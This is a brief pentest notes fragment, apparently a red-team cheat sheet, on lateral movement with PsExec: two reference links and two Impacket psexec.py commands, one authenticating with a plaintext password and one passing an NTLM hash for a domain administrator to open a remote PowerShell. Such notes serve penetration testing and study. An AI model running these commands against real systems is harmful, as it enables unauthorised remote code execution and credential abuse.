- https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec
- https://blog.openthreatresearch.com/ntobjectmanager_rpc_smb_scm
$ psexec.py snovvcrash:'Passw0rd!'@192.168.11.1
$ rlwrap -cAr psexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 megacorp.local/[email protected] powershell